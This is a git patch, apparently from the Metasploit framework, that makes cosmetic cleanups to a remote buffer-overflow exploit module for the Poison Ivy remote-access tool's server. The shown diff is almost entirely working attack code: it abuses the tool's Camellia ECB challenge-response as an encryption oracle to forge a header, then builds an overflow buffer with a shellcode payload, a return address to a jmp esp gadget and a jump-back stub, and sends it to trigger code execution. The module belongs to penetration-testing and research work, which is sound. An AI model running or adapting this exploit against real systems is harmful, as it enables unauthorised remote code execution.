From 88fdc9f1237a5c2e8730e3e7d12387fdbaaffc19 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 16 Sep 2015 16:14:21 -0500
Subject: [PATCH] Clean exploit method

---
 modules/exploits/windows/misc/poisonivy_bof.rb | 17 ++++++++---------
 1 file changed, 8 insertions(+), 9 deletions(-)

diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb
index f52cb16470..e79bd1a7ae 100644
--- a/modules/exploits/windows/misc/poisonivy_bof.rb
+++ b/modules/exploits/windows/misc/poisonivy_bof.rb
@@ -41,8 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Payload'        =>
         {
           'StackAdjustment'   => -4000,
-          'Space'             => 10000,
-          'BadChars'          => "",
+          'Space'             => 10000
         },
       'Platform'       => 'win',
       'Targets'        =>
@@ -151,29 +150,29 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Performing handshake...")
 
     # plaintext header
-    plaintextHeader = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+    plaintext_header = "\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\xbb\x00\x00\x00\xc2\x00\x00\x00\xc2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 
     # crafted challenge (first 32 bytes is our plaintext header), abuse challenge-response as encryption oracle
-    challenge = plaintextHeader + ("\x00" * (256 - 32))
+    challenge = plaintext_header + ("\x00" * (256 - 32))
     sock.put(challenge)
     # response = encrypt(challenge, key)
     response = sock.get_once
 
     # since encryption is done using Camellia in ECB mode, we can cut and paste the first 32 bytes (our header inside the crafted challenge) without knowing the key
-    encryptedHeader = response[0, 32]
+    encrypted_header = response[0, 32]
 
     # Don't change the nulls, or it might not work
     xploit  = ''
-    xploit << encryptedHeader
+    xploit << encrypted_header
     xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
     xploit << payload.encoded
     xploit << "\x00" * (target['Offset'] - xploit.length)
-    xploit << [target.ret].pack("V") # ret to a jmp esp opcode
-    xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
+    xploit << [target.ret].pack('V') # ret to a jmp esp opcode
+    xploit << [target['RWAddress']].pack('V') # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
     xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
 
     # The disconnection triggers the exploit
-    print_status("Sending exploit...")
+    print_status('Sending exploit...')
     sock.put(xploit)
     select(nil,nil,nil,5)
     disconnect